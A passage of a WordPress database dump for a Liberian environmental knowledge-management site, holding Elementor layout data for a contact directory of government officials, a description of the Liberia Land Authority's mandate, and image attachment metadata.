ype\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21967,3187,'_elementor_edit_mode','builder'),(21968,3187,'_elementor_template_type','wp-post'),(21969,3187,'_elementor_version','2.7.5'),(21970,3187,'_wp_page_template','default'),(21971,3187,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0986fea\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lla\\\",\\\"tag_id\\\":\\\"57\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lla\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21972,3187,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(21973,3187,'_thumbnail_id','3022'),(21975,3188,'_wp_attached_file','2019/11/Railroad.jpg'),(21976,3188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:20:\"2019/11/Railroad.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Railroad-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Railroad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Railroad-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21977,3189,'_wp_attached_file','2019/11/liberia_shipregistration2-1738x1158-1.jpg'),(21978,3189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:49:\"2019/11/liberia_shipregistration2-1738x1158-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"liberia_shipregistration2-1738x1158-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"liberia_shipregistration2-1738x1158-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"liberia_shipregistration2-1738x1158-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21979,3190,'_elementor_edit_mode','builder'),(21980,3190,'_elementor_template_type','wp-post'),(21981,3190,'_elementor_version','2.7.5'),(21982,3190,'_wp_page_template','default'),(21983,3190,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read 